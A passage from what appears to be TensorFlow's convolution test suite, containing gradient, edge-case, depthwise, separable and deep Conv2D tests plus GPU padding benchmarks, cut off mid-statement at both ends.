data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradientSamePaddingStride2x1(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=8,
input_cols=7,
filter_rows=4,
filter_cols=4,
in_depth=2,
out_depth=3,
stride_rows=2,
stride_cols=1,
padding="SAME",
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradientKernelSizeMatchesInputSize(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=4,
input_cols=3,
filter_rows=4,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding="VALID",
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradientKernelSizeMatchesInputSize(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=4,
input_cols=3,
filter_rows=4,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding="VALID",
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradient1x1PaddingStrideOne(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding=[[0, 0], [1, 1], [1, 1], [0, 0]],
test_input=True,
data_format=data_format,
use_gpu=use_gpu,
max_err=0.0025)
@test_util.deprecated_graph_mode_only
def testFilterGradient1x1PaddingStrideOne(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding=[[0, 0], [1, 1], [1, 1], [0, 0]],
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradient1x1PaddingStrideTwo(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=4,
input_cols=5,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=2,
stride_cols=2,
padding=[[0, 0], [1, 1], [1, 1], [0, 0]],
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradient1x1PaddingStrideTwo(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=4,
input_cols=5,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=2,
stride_cols=2,
padding=[[0, 0], [1, 1], [1, 1], [0, 0]],
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradient2x2PaddingStrideOne(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding=[[0, 0], [2, 2], [2, 2], [0, 0]],
test_input=True,
data_format=data_format,
use_gpu=use_gpu,
max_err=0.003)
@test_util.deprecated_graph_mode_only
def testFilterGradient2x2PaddingStrideOne(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding=[[0, 0], [2, 2], [2, 2], [0, 0]],
test_input=False,
data_format=data_format,
use_gpu=use_gpu,
max_err=0.003)
@test_util.deprecated_graph_mode_only
def testInputGradient1_2_3_4PaddingStride3x2(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=8,
input_cols=5,
filter_rows=4,
filter_cols=2,
in_depth=3,
out_depth=2,
stride_rows=3,
stride_cols=2,
padding=[[0, 0], [1, 2], [3, 4], [0, 0]],
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradient1_2_3_4PaddingStride3x2(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=8,
input_cols=5,
filter_rows=4,
filter_cols=2,
in_depth=3,
out_depth=2,
stride_rows=3,
stride_cols=2,
padding=[[0, 0], [1, 2], [3, 4], [0, 0]],
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradient4_3_2_1PaddingStride2x1(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=3,
input_rows=5,
input_cols=7,
filter_rows=3,
filter_cols=2,
in_depth=1,
out_depth=2,
stride_rows=2,
stride_cols=1,
padding=[[0, 0], [4, 3], [2, 1], [0, 0]],
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradient4_3_2_1PaddingStride2x1(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=3,
input_rows=5,
input_cols=7,
filter_rows=3,
filter_cols=2,
in_depth=1,
out_depth=2,
stride_rows=2,
stride_cols=1,
padding=[[0, 0], [4, 3], [2, 1], [0, 0]],
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradient0_0_0_5PaddingStride1x2(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=6,
input_cols=7,
filter_rows=3,
filter_cols=4,
in_depth=3,
out_depth=2,
stride_rows=1,
stride_cols=2,
padding=[[0, 0], [0, 0], [0, 5], [0, 0]],
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradient0_0_0_5PaddingStride1x2(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=6,
input_cols=7,
filter_rows=3,
filter_cols=4,
in_depth=3,
out_depth=2,
stride_rows=1,
stride_cols=2,
padding=[[0, 0], [0, 0], [0, 5], [0, 0]],
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testShapeFunctionEdgeCases(self):
# All shapes unknown.
c1 = nn_ops.conv2d(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.float32),
strides=[1, 1, 1, 1],
padding="SAME")
self.assertEqual([None, None, None, None], c1.get_shape().as_list())
# Incorrect input shape.
with self.assertRaises(ValueError):
nn_ops.conv2d(
array_ops.placeholder(
dtypes.float32, shape=[1, 3]),
array_ops.placeholder(dtypes.float32),
strides=[1, 1, 1, 1],
padding="SAME")
# Incorrect filter shape.
with self.assertRaises(ValueError):
nn_ops.conv2d(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(
dtypes.float32, shape=[1, 3]),
strides=[1, 1, 1, 1],
padding="SAME")
# Depth mismatch.
with self.assertRaises(ValueError):
nn_ops.conv2d(
array_ops.placeholder(
dtypes.float32, shape=[32, 20, 20, 3]),
array_ops.placeholder(
dtypes.float32, shape=[4, 4, 2, 2]),
strides=[1, 1, 1, 1],
padding="SAME")
# Input depth divisible by filter depth (group convolution).
# No exceptions should appear.
nn_ops.conv2d(
array_ops.placeholder(dtypes.float32, shape=[32, 20, 20, 8]),
array_ops.placeholder(dtypes.float32, shape=[4, 4, 2, 16]),
strides=[1, 1, 1, 1],
padding="SAME")
# Negative padding.
with self.assertRaises(ValueError):
nn_ops.conv2d(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.float32),
strides=[1, 1, 1, 1],
padding=[[0, 0], [0, -1], [1, 2], [0, 0]])
# Nonzero padding in nonspatial dimension.
with self.assertRaises(ValueError):
nn_ops.conv2d(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.float32),
strides=[1, 1, 1, 1],
padding=[[1, 0], [0, 0], [0, 0], [0, 0]])
# Nonzero NCHW padding in nonspatial dimension.
with self.assertRaises(ValueError):
nn_ops.conv2d(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.float32),
strides=[1, 1, 1, 1],
padding=[[0, 0], [0, 1], [0, 0], [0, 0]],
data_format="NCHW")
# Wrong amount of padding
with self.assertRaises(ValueError):
nn_ops.conv2d(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.float32),
strides=[1, 1, 1, 1],
padding=[[0, 0], [0, 0], [0, 0]])
# Only specify one padding amount per dimension
with self.assertRaises(ValueError):
nn_ops.conv2d(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.float32),
strides=[1, 1, 1, 1],
padding=[[0], [0], [0], [0]])
# Explicit padding elements are not lists
with self.assertRaises(ValueError):
nn_ops.conv2d(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.float32),
strides=[1, 1, 1, 1],
padding=[0, 0, 0, 0])
@test_util.deprecated_graph_mode_only
def testOpEdgeCases(self):
with self.cached_session() as sess:
# Illegal strides.
with self.assertRaisesRegex(errors_impl.UnimplementedError,
"strides in the batch and depth"):
input_placeholder = array_ops.placeholder(dtypes.float32)
input_val = np.ones([10, 10])
filter_placeholder = array_ops.placeholder(dtypes.float32)
filter_val = np.ones([10, 10])
sess.run(
nn_ops.conv2d(
input_placeholder,
filter_placeholder,
strides=[2, 1, 1, 1],
padding="SAME"),
feed_dict={
input_placeholder: input_val,
filter_placeholder: filter_val
})
with self.assertRaisesRegex(errors_impl.UnimplementedError,
"strides in the batch and depth"):
input_placeholder = array_ops.placeholder(dtypes.float32)
filter_placeholder = array_ops.placeholder(dtypes.float32)
input_val = np.ones([10, 10])
filter_val = np.ones([10, 10])
sess.run(
nn_ops.conv2d(
input_placeholder,
filter_placeholder,
strides=[1, 1, 1, 2],
padding="SAME"),
feed_dict={
input_placeholder: input_val,
filter_placeholder: filter_val
})
# Filter larger than input.
with self.assertRaisesRegex(ValueError, "Negative dimension size"):
input_placeholder = array_ops.placeholder(
dtypes.float32, shape=[32, 20, 20, 3])
input_val = np.ones([32, 20, 20, 3])
filter_placeholder = array_ops.placeholder(
dtypes.float32, shape=[20, 21, 3, 2])
filter_val = np.ones([20, 21, 3, 2])
sess.run(
nn_ops.conv2d(
input_placeholder,
filter_placeholder,
strides=[1, 1, 1, 1],
padding="VALID"),
feed_dict={
input_placeholder: input_val,
filter_placeholder: filter_val
})
with self.assertRaisesRegex(ValueError, "Negative dimension size"):
input_placeholder = array_ops.placeholder(
dtypes.float32, shape=[32, 20, 20, 3])
input_val = np.ones([32, 20, 20, 3])
filter_placeholder = array_ops.placeholder(
dtypes.float32, shape=[21, 20, 3, 2])
filter_val = np.ones([21, 20, 3, 2])
sess.run(
nn_ops.conv2d(
input_placeholder,
filter_placeholder,
strides=[1, 1, 1, 1],
padding="VALID"),
feed_dict={
input_placeholder: input_val,
filter_placeholder: filter_val
})
# Filter larger than input + padding.
with self.assertRaisesRegex(ValueError, "Negative dimension size"):
input_placeholder = array_ops.placeholder(
dtypes.float32, shape=[32, 20, 20, 3])
input_val = np.ones([32, 20, 20, 3])
filter_placeholder = array_ops.placeholder(
dtypes.float32, shape=[24, 25, 3, 2])
filter_val = np.ones([24, 25, 3, 2])
sess.run(
nn_ops.conv2d(
input_placeholder,
filter_placeholder,
strides=[1, 1, 1, 1],
padding=[[0, 0], [2, 2], [2, 2], [0, 0]]),
feed_dict={
input_placeholder: input_val,
filter_placeholder: filter_val
})
# Negative padding during backprop.
with self.assertRaisesRegex(
errors_impl.InvalidArgumentError,
"All elements of explicit_paddings must be nonnegative"):
filter_placeholder = array_ops.placeholder(
dtypes.float32, shape=[18, 18, 3, 2])
filter_val = np.ones([18, 18, 3, 2])
out_backprop = array_ops.placeholder(
dtypes.float32, shape=[32, 3, 2, 2])
out_backprop_val = np.ones([32, 3, 2, 2])
sess.run(
nn_ops.conv2d_backprop_input([32, 20, 20, 3],
filter_placeholder,
out_backprop,
strides=[1, 1, 1, 1],
padding=[[0, 0], [-1, 0], [0, 0],
[0, 0]]),
feed_dict={
filter_placeholder: filter_val,
out_backprop: out_backprop_val
})
with self.assertRaisesRegex(
errors_impl.InvalidArgumentError,
"All elements of explicit_paddings must be nonnegative"):
input_placeholder = array_ops.placeholder(
dtypes.float32, shape=[32, 20, 20, 3])
input_val = np.ones([32, 20, 20, 3])
out_backprop = array_ops.placeholder(
dtypes.float32, shape=[32, 3, 2, 2])
out_backprop_val = np.ones([32, 3, 2, 2])
sess.run(
nn_ops.conv2d_backprop_filter(
input_placeholder, [18, 18, 3, 2],
out_backprop,
strides=[1, 1, 1, 1],
padding=[[0, 0], [-1, 0], [0, 0], [0, 0]]),
feed_dict={
input_placeholder: input_val,
out_backprop: out_backprop_val
})
class DepthwiseConv2DTest(test.TestCase):
def _VerifyValues(self, tensor_in_sizes, filter_in_sizes, stride, padding,
expected):
"""Verifies the output values of the convolution function.
Args:
tensor_in_sizes: Input tensor dimensions in
[batch, input_rows, input_cols, input_depth].
filter_in_sizes: Filter tensor dimensions in
[filter_rows, filter_cols, input_depth, depth_multiplier].
stride: Stride.
padding: Padding type.
expected: An array containing the expected operation outputs.
"""
total_size_1 = 1
total_size_2 = 1
for s in tensor_in_sizes:
total_size_1 *= s
for s in filter_in_sizes:
total_size_2 *= s
# Initializes the input tensor with array containing incrementing
# numbers from 1.
x1 = [f * 1.0 for f in range(1, total_size_1 + 1)]
x2 = [f * 1.0 for f in range(1, total_size_2 + 1)]
with self.cached_session() as sess:
t1 = constant_op.constant(x1, shape=tensor_in_sizes)
t1.set_shape(tensor_in_sizes)
t2 = constant_op.constant(x2, shape=filter_in_sizes)
conv = nn_impl.depthwise_conv2d(
t1, t2, strides=[1, stride, stride, 1], padding=padding)
value = self.evaluate(conv)
tf_logging.debug("value = %s", value)
self.assertArrayNear(expected, np.ravel(value), 1e-5)
self.assertShapeEqual(value, conv)
def testConv2D2x2Filter(self):
# The inputs look like this (it's a 3 x 2 matrix, each of depth 2):
#
# [ (1.0, 2.0), (3.0, 4.0), ( 5.0, 6.0) ]
# [ (7.0, 8.0), (9.0, 10.0), (11.0, 12.0) ]
# We can view this as two inputs
#
# input depth 0:
#
# [ 1.0, 3.0, 5.0 ]
# [ 7.0, 9.0, 11.0 ]
#
# input depth 1:
#
# [ 2.0, 4.0, 6.0 ]
# [ 8.0, 10.0, 12.0 ]
#
# The filter looks like this (it has two 2 x 2 patches, each generating 2
# depths):
#
# filter #0:
#
# [ (1.0, 3.0), ( 5.0, 7.0)]
# [ (9.0, 11.0), (13.0, 15.0)]
#
# filter #1:
#
# [ ( 2.0, 4.0), ( 6.0, 8.0)]
# [ (10.0, 12.0), (14.0, 16.0)]
#
# So the outputs are:
#
# (position 0, 0: in_depth 0, output_depth 0 -- using filter #0)
# 1.0 * 1.0 + 7.0 * 9.0 + 3.0 * 5.0 + 9.0 * 13.0 = 196
# (position 0, 0: in_depth 0, output_depth 1 -- using filter #1)
# 1.0 * 2.0 + 7.0 * 10.0 + 3.0 * 6.0 + 9.0 * 14.0 = 216
# (position 0, 0: in_depth 1, output_depth 2 -- using filter #0)
# 2.0 * 3.0 + 8.0 * 11.0 + 4.0 * 7.0 + 10.0 * 15.0 = 272
# (position 0, 0: in_depth 1, output_depth 3 -- using filter #1)
# 2.0 * 4.0 + 8.0 * 12.0 + 4.0 * 8.0 + 10.0 * 16.0 = 296
#
# (position 1, 0: in_depth 0, output_depth 0 -- using filter #0)
# 3.0 * 1.0 + 9.0 * 9.0 + 5.0 * 5.0 + 11.0 * 13.0 = 252
# (position 1, 0: in_depth 0, output_depth 1 -- using filter #1)
# 3.0 * 2.0 + 9.0 * 10.0 + 5.0 * 6.0 + 11.0 * 14.0 = 280
# (position 1, 0: in_depth 1, output_depth 2 -- using filter #0)
# 4.0 * 3.0 + 10.0 * 11.0 + 6.0 * 7.0 + 12.0 * 15.0 = 344
# (position 1, 0: in_depth 1, output_depth 3 -- using filter #1)
# 4.0 * 4.0 + 10.0 * 12.0 + 6.0 * 8.0 + 12.0 * 16.0 = 376
expected_output = [196, 216, 272, 296, 252, 280, 344, 376]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 2],
filter_in_sizes=[2, 2, 2, 2],
stride=1,
padding="VALID",
expected=expected_output)
class SeparableConv2DTest(test.TestCase):
def _InitValues(self, sizes):
"""Initializes values for input tensors.
Args:
sizes: Tensor dimensions.
Returns:
Tensor initialized to values.
"""
total_size = 1
for s in sizes:
total_size *= s
x = [f * 0.5 for f in range(1, total_size + 1)]
return constant_op.constant(x, shape=sizes)
def _VerifyValues(self,
tensor_in_sizes,
depthwise_filter_in_sizes,
pointwise_filter_in_sizes,
stride,
padding,
expected,
data_format="NHWC"):
"""Verifies the output values of the separable convolution function.
Args:
tensor_in_sizes: Input tensor dimensions.
depthwise_filter_in_sizes: Depthwise filter tensor dimensions.
pointwise_filter_in_sizes: Pointwise filter tensor dimensions.
stride: Stride.
padding: Padding type.
expected: An array containing the expected operation outputs.
data_format: string data format for input tensor.
"""
with self.cached_session(use_gpu=True) as sess:
t1 = self._InitValues(tensor_in_sizes)
f1 = self._InitValues(depthwise_filter_in_sizes)
f1.set_shape(depthwise_filter_in_sizes)
f2 = self._InitValues(pointwise_filter_in_sizes)
real_t1 = t1
strides = [1, stride, stride, 1]
if data_format == "NCHW":
real_t1 = array_ops.transpose(t1, [0, 3, 1, 2])
strides = [1, 1, stride, stride]
if isinstance(padding, list):
padding = [padding[0], padding[3], padding[1], padding[2]]
conv = nn_impl.separable_conv2d(
real_t1,
f1,
f2,
strides=strides,
padding=padding,
data_format=data_format)
if data_format == "NCHW":
conv = array_ops.transpose(conv, [0, 2, 3, 1])
value = self.evaluate(conv)
tf_logging.debug("value = %s", value)
self.assertArrayNear(expected, np.ravel(value), 2e-3)
self.assertShapeEqual(value, conv)
def _testSeparableConv2D(self, data_format):
# The output is the result of two convolutions:
# First with tensor_in[1, 4, 4, 2] * filter1[2, 2, 2, 3].
# Second with intermediate_out[1, 4, 4, 6] * filter2[1, 1, 6, 7].
# Complexity is O(2*3*2*2 + 6*7*1*1) as opposed to O(2*7*2*2).
expected_output = [
6644.5, 6971.5, 7298.5, 7625.5, 7952.5, 8279.5, 8606.5, 8154.5, 8556.5,
8958.5, 9360.5, 9762.5, 10164.5, 10566.5, 9664.5, 10141.5, 10618.5,
11095.5, 11572.5, 12049.5, 12526.5, 4145.5, 4346.5, 4547.5, 4748.5,
4949.5, 5150.5, 5351.5, 12684.5, 13311.5, 13938.5, 14565.5, 15192.5,
15819.5, 16446.5, 14194.5, 14896.5, 15598.5, 16300.5, 17002.5, 17704.5,
18406.5, 15704.5, 16481.5, 17258.5, 18035.5, 18812.5, 19589.5, 20366.5,
6499.5, 6814.5, 7129.5, 7444.5, 7759.5, 8074.5, 8389.5, 18724.5,
19651.5, 20578.5, 21505.5, 22432.5, 23359.5, 24286.5, 20234.5, 21236.5,
22238.5, 23240.5, 24242.5, 25244.5, 26246.5, 21744.5, 22821.5, 23898.5,
24975.5, 26052.5, 27129.5, 28206.5, 8853.5, 9282.5, 9711.5, 10140.5,
10569.5, 10998.5, 11427.5, 5746.75, 6010.75, 6274.75, 6538.75, 6802.75,
7066.75, 7330.75, 6168.75, 6452.25, 6735.75, 7019.25, 7302.75, 7586.25,
7869.75, 6590.75, 6893.75, 7196.75, 7499.75, 7802.75, 8105.75, 8408.75,
2036.25, 2119.5, 2202.75, 2286.0, 2369.25, 2452.5, 2535.75
]
self._VerifyValues(
tensor_in_sizes=[1, 4, 4, 2],
depthwise_filter_in_sizes=[2, 2, 2, 3],
pointwise_filter_in_sizes=[1, 1, 6, 7],
stride=1,
padding="SAME",
expected=expected_output,
data_format=data_format)
def testSeparableConv2D(self):
self._testSeparableConv2D("NHWC")
def disabledtestSeparableConv2DNCHW(self):
if not test.is_gpu_available():
return
self._testSeparableConv2D("NCHW")
def _testSeparableConv2DEqualInputOutputDepth(self, data_format):
# The output is the result of two convolutions:
# First with tensor_in[1, 4, 4, 2] * filter1[2, 2, 3, 3].
# Second with intermediate_out[1, 4, 4, 6] * filter2[1, 1, 6, 6].
# Complexity is O(2*3*2*2 + 6*6*1*1) as opposed to O(2*6*2*2).
expected_output = [
5742.0, 6069.0, 6396.0, 6723.0, 7050.0, 7377.0, 7047.0, 7449.0, 7851.0,
8253.0, 8655.0, 9057.0, 8352.0, 8829.0, 9306.0, 9783.0, 10260.0,
10737.0, 3582.0, 3783.0, 3984.0, 4185.0, 4386.0, 4587.0, 10962.0,
11589.0, 12216.0, 12843.0, 13470.0, 14097.0, 12267.0, 12969.0, 13671.0,
14373.0, 15075.0, 15777.0, 13572.0, 14349.0, 15126.0, 15903.0, 16680.0,
17457.0, 5616.0, 5931.0, 6246.0, 6561.0, 6876.0, 7191.0, 16182.0,
17109.0, 18036.0, 18963.0, 19890.0, 20817.0, 17487.0, 18489.0, 19491.0,
20493.0, 21495.0, 22497.0, 18792.0, 19869.0, 20946.0, 22023.0, 23100.0,
24177.0, 7650.0, 8079.0, 8508.0, 8937.0, 9366.0, 9795.0, 4963.5, 5227.5,
5491.5, 5755.5, 6019.5, 6283.5, 5328.0, 5611.5, 5895.0, 6178.5, 6462.0,
6745.5, 5692.5, 5995.5, 6298.5, 6601.5, 6904.5, 7207.5, 1757.25, 1840.5,
1923.75, 2007.0, 2090.25, 2173.5
]
self._VerifyValues(
tensor_in_sizes=[1, 4, 4, 2],
depthwise_filter_in_sizes=[2, 2, 2, 3],
pointwise_filter_in_sizes=[1, 1, 6, 6],
stride=1,
padding="SAME",
expected=expected_output,
data_format=data_format)
@test_util.deprecated_graph_mode_only
def testSeparableConv2DEqualInputOutputDepth(self):
self._testSeparableConv2DEqualInputOutputDepth("NHWC")
def testSeparableConv2DEqualInputOutputDepthNCHW(self):
if not test.is_gpu_available():
return
self._testSeparableConv2DEqualInputOutputDepth("NCHW")
def _testSeparableConv2dExplicitPadding(self, data_format):
tensor_in_sizes = [1, 4, 4, 2]
depthwise_filter_in_sizes = [2, 2, 2, 3]
pointwise_filter_in_sizes = [1, 1, 6, 7]
padding = [[0, 0], [1, 2], [3, 4], [0, 0]]
with self.cached_session(use_gpu=True):
# Compute the 'expected' values by manually padding before calling
# separable_conv2d
t1 = self._InitValues(tensor_in_sizes)
t1 = array_ops.pad(t1, padding)
f1 = self._InitValues(depthwise_filter_in_sizes)
f1.set_shape(depthwise_filter_in_sizes)
f2 = self._InitValues(pointwise_filter_in_sizes)
conv = nn_impl.separable_conv2d(
t1,
f1,
f2,
strides=[1, 1, 1, 1],
padding="VALID",
data_format="NHWC")
expected = self.evaluate(conv)
expected = np.ravel(expected)
self._VerifyValues(
tensor_in_sizes=tensor_in_sizes,
depthwise_filter_in_sizes=depthwise_filter_in_sizes,
pointwise_filter_in_sizes=pointwise_filter_in_sizes,
stride=1,
padding=padding,
expected=expected,
data_format=data_format)
def testSeparableConv2dExplicitPadding(self):
self._testSeparableConv2dExplicitPadding("NHWC")
def testSeparableConv2dExplicitPaddingNCHW(self):
if not test.is_gpu_available():
return
self._testSeparableConv2dExplicitPadding("NCHW")
class DeepConv2DTest(test.TestCase):
def _CompareFwdConv2D(self, tensor_in_sizes, filter_in_sizes, conv_strides,
padding):
"""Verifies that DeepConv2D and Conv2D produce the same values.
Args:
tensor_in_sizes: Input tensor dimensions in
[batch, input_rows, input_cols, input_depth].
filter_in_sizes: Filter tensor dimensions in
[kernel_rows, kernel_cols, input_depth, output_depth].
conv_strides: [row_stride, col_stride] for the convolution;
padding: Padding type.
"""
x1 = np.random.rand(*tensor_in_sizes).astype(np.float32)
x2 = np.random.rand(*filter_in_sizes).astype(np.float32)
with self.cached_session(use_gpu=False) as sess:
t1 = constant_op.constant(x1, shape=tensor_in_sizes)
t2 = constant_op.constant(x2, shape=filter_in_sizes)
strides = [1] + conv_strides + [1]
conv = nn_ops.conv2d(t1, t2, strides=strides, padding=padding)
os.environ["TF_USE_DEEP_CONV2D"] = "0"
values_expect = self.evaluate([conv])
os.environ["TF_USE_DEEP_CONV2D"] = "1"
values_test = self.evaluate([conv])
self.assertAllClose(values_expect, values_test, rtol=1e-5, atol=1e-5)
def _RunTestCases(self, conv_strides, padding):
input_sizes = [[5, 5, 5, 1248], [3, 17, 17, 192], [2, 35, 35, 288],
[2, 6, 8, 517], [2, 7, 4, 81], [3, 11, 3, 77]]
filter_sizes = [[3, 3, 1248, 128], [3, 3, 192, 192], [3, 3, 288, 384],
[3, 3, 517, 64], [3, 3, 81, 77], [3, 3, 77, 181]]
for input_shape, filter_shape in zip(input_sizes, filter_sizes):
self._CompareFwdConv2D(input_shape, filter_shape, conv_strides, padding)
def testConv2D3x3FilterStride1x1Valid(self):
self._RunTestCases([1, 1], "VALID")
def testConv2D3x3FilterStride1x1Same(self):
self._RunTestCases([1, 1], "SAME")
class Conv2DBenchmark(test.Benchmark):
def benchmarkGPUConvStackFirst(self):
# Benchmark the first iteration of a conv-net with many identical conv
# operations.
if not test.is_gpu_available():
return
with ops.Graph().as_default(), session_lib.Session() as session:
batch_size = 1
timesteps = 600
features = 1
inputs = random_ops.random_uniform(
[batch_size, 1, timesteps, features], seed=1234)
num_outputs_list = [512] * 40 + [1]
kernel_w = 3
x = inputs
for num_outputs in num_outputs_list:
x = convolutional.conv2d(x, num_outputs, [1, kernel_w])
outputs = x
self.evaluate(variables.global_variables_initializer())
num_iterations = 4
for iter_index in xrange(num_iterations):
start = time.time()
session.run(outputs)
wall_time = time.time() - start
self.report_benchmark(
name="conv_stack_iter_%d" % iter_index, wall_time=wall_time)
tf_logging.info("conv_stack_iter_%d: %.4f" % (iter_index, wall_time))
def _bench_op(self, name, op, burn_iters, num_iters):
config = config_pb2.ConfigProto()
# Prevent Grappler from optimizing away the entire graph.
config.graph_options.rewrite_options.dependency_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
with session_lib.Session(config=config) as session:
self.evaluate(variables.global_variables_initializer())
self.run_op_benchmark(
session, op, burn_iters=burn_iters, min_iters=num_iters, name=name)
def benchmarkExplicitVsManualPadding(self):
"""Compare performance of EXPLICIT padding and calling tf.pad.
A Conv2D op with EXPLICIT padding is benchmarked, and a tf.pad with the same
padding followed by an equivalent Conv2D op is benchmarked.
"""
if not test.is_gpu_available():
return
with ops.Graph().as_default():
burn_iters = 15
num_iters = 300
batch_size = 64
# The input and filter correspond to the first layer of Resnet50.
input = variables.Variable( # pylint: disable=redefined-builtin
random_ops.random_uniform([
batch_size,
3,
224,
224
]))
filter = variables.Variable(random_ops.random_uniform([7, 7, 3, 64])) # pylint: disable=redefined-builtin
strides = [1, 1, 2, 2]
padding = [(0, 0), (0, 0), (3, 3), (3, 3)]
output_explicit_pad = nn_ops.conv2d(
input, filter, strides, padding=padding, data_format="NCHW")
input_padded = array_ops.pad(input, padding)
output_manual_pad = nn_ops.conv2d(
input_padded, filter, strides, padding="VALID", data_format="NCHW")
# Benchmark just the forward pass.
self._bench_op("explicit_pad_forward", output_explicit_pad.op, burn_iters,
num_iters)
self._bench_op("manual_pad_forward", output_manual_pad.op, burn_iters,
num_iters)
# Benchmark both the forward and backwards passes.
input_grad_explicit_pad, filter_grad_explicit_pad = (
gradients_impl.gradients(output_explicit_pad, [input, filter]))
self._bench_op(
"explicit_pad_backward",
control_flow_ops.group(input_grad_explicit_pad,
filter_grad_explicit_pad), burn_iters,
num_iters)
input_grad_manual_pad, filter_grad_manual_pad = gradients_impl.gradients(
output_manual_pad, [input, filter])
self._bench_op(
"manual_pad_backward",
control_flow_ops.group(input_grad_manual_pad, filter_grad_manual_pad),
burn_iters, num_iters)
def benchmarkExplicitVsSamePaddingGraph(self):
"""Compare performance of EXPLICIT and SAME padding in graph mode.
A Conv2D op with SAME padding is benchmarked, and an equivalent Conv2D op
with explicit padding is benchmarked, where the padding is the same as in
the SAME case. The purpose is to ensure EXPLICIT padding is just as
efficient as the SAME case
"""
if not test.is_gpu_available():
return
with ops.Graph().as_default():
burn_iters = 15
num_convs = 20
num_iters = 50
batch_size = 64
# The input and filter correspond to a middle layer of Resnet50.
input = variables.Variable( # pylint: disable=redefined-builtin
random_ops.random_uniform([
batch_size,
256,
14,
14
]))
filter = variables.Variable(random_ops.random_uniform([3, 3, 256, 256])) # pylint: disable=redefined-builtin
strides = [1, 1, 1, 1]
padding = [(0, 0), (0, 0), (1, 1), (1, 1)]
output_explicit_pad = input
output_same_pad = input
for _ in range(num_convs):
output_explicit_pad = nn_ops.conv2d(
output_explicit_pad,
filter,
strides,
padding=padding,
data_format="NCHW")
output_same_pad = nn_ops.conv2d(
output_same_pad,
filter,
strides,
padding="SAME",
data_format="NCHW")
grad_explicit_pad, = gradients_impl.gradients(output_explicit_pad, filter)
grad_same_pad, = gradients_impl.gradients(output_same_pad, filter)
self._bench_op("graph_explicit_pad", grad_explicit_pad.op, burn_iters,
num_iters)
self._bench_op("graph_same_pad", grad_same_pad.op, burn_iters, num_iters)
def benchmarkExplicitVsSamePaddingEager(self):
"""Compare performance of EXPLICIT and SAME padding in eager mode.
A Conv2D op with SAME padding is benchmarked, and an equivalent Conv2D op
with explicit padding is benchmarked, where the padding is the same as in
the SAME case. Currently, EXPLICIT padding is slightly slower, due to the
fact the Python padding list must be checked and processed before the Conv2D
op can run.
"""
# TODO(reedwm): Make EXPLICIT padding as fast as SAME padding.
if not test.is_gpu_available():
return
with context.eager_mode():
burn_iters = 15
num_convs = 20
num_iters = 50
batch_size = 64
# The input and filter correspond to a middle layer of Resnet50.
input = variables.Variable( # pylint: disable=redefined-builtin
